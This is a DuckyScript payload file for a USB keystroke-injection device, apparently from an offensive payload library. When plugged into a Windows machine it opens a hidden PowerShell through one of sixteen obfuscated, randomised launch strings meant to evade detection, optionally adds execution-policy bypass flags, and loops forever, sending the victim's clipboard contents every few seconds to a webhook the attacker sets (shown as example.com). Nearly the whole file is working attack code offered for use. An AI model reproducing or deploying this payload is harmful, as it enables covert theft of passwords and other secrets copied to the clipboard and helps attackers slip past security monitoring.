Path: blob/master/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
2968 views
REM Clipboard-Creep1REM Version 1.02REM OS: Windows3REM Author: 0i41E4REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum5REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.6REM Based on Clipboard-Creep.ps1 - https://github.com/0i41E/ClipBoard-Creep789EXTENSION PASSIVE_WINDOWS_DETECT10REM VERSION 1.111REM AUTHOR: Korben1213REM_BLOCK DOCUMENTATION14Windows fully passive OS Detection and passive Detect Ready15Includes its own passive detect ready.16Does not require additional extensions.1718USAGE:19Extension runs inline (here)20Place at beginning of payload (besides ATTACKMODE) to act as dynamic21boot delay22$_OS will be set to WINDOWS or NOT_WINDOWS23See end of payload for usage within payload24END_REM2526REM CONFIGURATION:27DEFINE #MAX_WAIT 15028DEFINE #CHECK_INTERVAL 2029DEFINE #WINDOWS_HOST_REQUEST_COUNT 230DEFINE #NOT_WINDOWS 73132$_OS = #NOT_WINDOWS3334VAR $MAX_TRIES = #MAX_WAIT35WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))36DELAY #CHECK_INTERVAL37$MAX_TRIES = ($MAX_TRIES - 1)38END_WHILE39IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN40$_OS = WINDOWS41END_IF4243REM_BLOCK EXAMPLE USAGE AFTER EXTENSION44IF ($_OS == WINDOWS) THEN45STRING HELLO WINDOWS!46ELSE47STRING HELLO WORLD!48END_IF49END_REM50END_EXTENSION5152EXTENSION EXTENSION Rolling_Powershell_Execution53REM VERSION 1.054REM Author: 0i41E55REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek56REM Requirements: PayloadStudio v.1.3 minimum57REM Starts Powershell in uncommon ways to avoid basic detection58REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.5960REM CONFIGURATION:61REM Add ExecutionPolicy bypass62DEFINE #EXECUTIONPOLICY FALSE63DEFINE #DELAY 5006465$_RANDOM_MIN = 166$_RANDOM_MAX = 1667VAR $RANDOM_PS = $_RANDOM_INT68FUNCTION Rolling_Powershell_Execution()69IF ($RANDOM_PS == 1) THEN70STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"71ELSE IF ($RANDOM_PS == 2) THEN72STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"73ELSE IF ($RANDOM_PS == 3) THEN74STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"75ELSE IF ($RANDOM_PS == 4) THEN76STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"77ELSE IF ($RANDOM_PS == 5) THEN78STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"79ELSE IF ($RANDOM_PS == 6) THEN80STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"81ELSE IF ($RANDOM_PS == 7) THEN82STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"83ELSE IF ($RANDOM_PS == 8) THEN84STRING powershell -NoPro -noninT -win h85ELSE IF ($RANDOM_PS == 9) THEN86STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"87ELSE IF ($RANDOM_PS == 2) THEN88STRING powershell.exe -NoP -nOni -W h89ELSE IF ($RANDOM_PS == 10) THEN90STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"91ELSE IF ($RANDOM_PS == 11) THEN92STRING powershell -nopr -noninT -W HiddEn93ELSE IF ($RANDOM_PS == 12) THEN94STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"95ELSE IF ($RANDOM_PS == 13) THEN96STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"97ELSE IF ($RANDOM_PS == 14) THEN98STRING powershell -noproF -noni -W Hi99ELSE IF ($RANDOM_PS == 15) THEN100STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"101ELSE ($RANDOM_PS == 16) THEN102STRING powershell.exe -noP -nOnI -windo H103END_IF104105106IF_DEFINED_TRUE #EXECUTIONPOLICY107SPACE108IF (($RANDOM_PS % 2) == 0) THEN109STRING -ep ByPasS110ELSE IF (($RANDOM_PS % 5) == 0) THEN111STRING -exec bypass112ELSE IF (($RANDOM_PS % 7) == 0) THEN113STRING -exeC byPasS114ELSE IF (($RANDOM_PS % 10) == 0) THEN115STRING -exEcUtionPoL bYpaSs116ELSE IF (($RANDOM_PS % 12) == 0) THEN117STRING -exEcUtion bYPaSs118ELSE119STRING -eP BYPaSs120END_IF121END_IF_DEFINED122ENTER123DELAY #DELAY124END_FUNCTION125REM EXAMPLE USAGE AFTER EXTENSION126REM DELAY 2000127REM GUI r128REM DELAY 2000129REM Rolling_Powershell_Execution()130END_EXTENSION131132EXTENSION Detect_Finished133REM VERSION 1.0134REM AUTHOR: 0i41E135136REM_BLOCK DOCUMENTATION137USAGE:138Use the function Detect_Finished() to signal the finished execution of your payload.139END_REM140141REM CONFIGURATION:142DEFINE #PAUSE 150143FUNCTION Detect_Finished()144IF ($_CAPSLOCK_ON == FALSE)145CAPSLOCK146DELAY #PAUSE147CAPSLOCK148DELAY #PAUSE149CAPSLOCK150DELAY #PAUSE151CAPSLOCK152ATTACKMODE OFF153ELSE IF154CAPSLOCK155DELAY #PAUSE156CAPSLOCK157DELAY #PAUSE158CAPSLOCK159ATTACKMODE OFF160END_IF161END_FUNCTION162END_EXTENSION163164165REM Define URL of your catching webhook166DEFINE #HOOK "https://example.com/"167REM Define the pause between calls to your webhook.168DEFINE #CALLBACK_DELAY 12169170IF ($_OS == WINDOWS) THEN171GUI r172DELAY 1000173REM randomized and obfuscated way to start powershell174Rolling_Powershell_Execution()175STRINGLN_POWERSHELL176$e = $null177while ($true)178{179$c = Get-Clipboard180if ($c)181{182if ($c -ne $e)183{184$o = "Clipboard content: $c"185irm -Uri #HOOK -Method POST -Body $o186} else187{188$o = "Clipboard content hasn't changed"189irm -Uri #HOOK -Method POST -Body $o190}191$e = $c192} else193{194$o = "Clipboard is empty"195irm -Uri #HOOK -Method POST -Body $o196}197sleep -s #CALLBACK_DELAY198}199END_STRINGLN200ENTER201DELAY 250202Detect_Finished()203ELSE204ATTACKMODE OFF205END_IF206207208209210211212213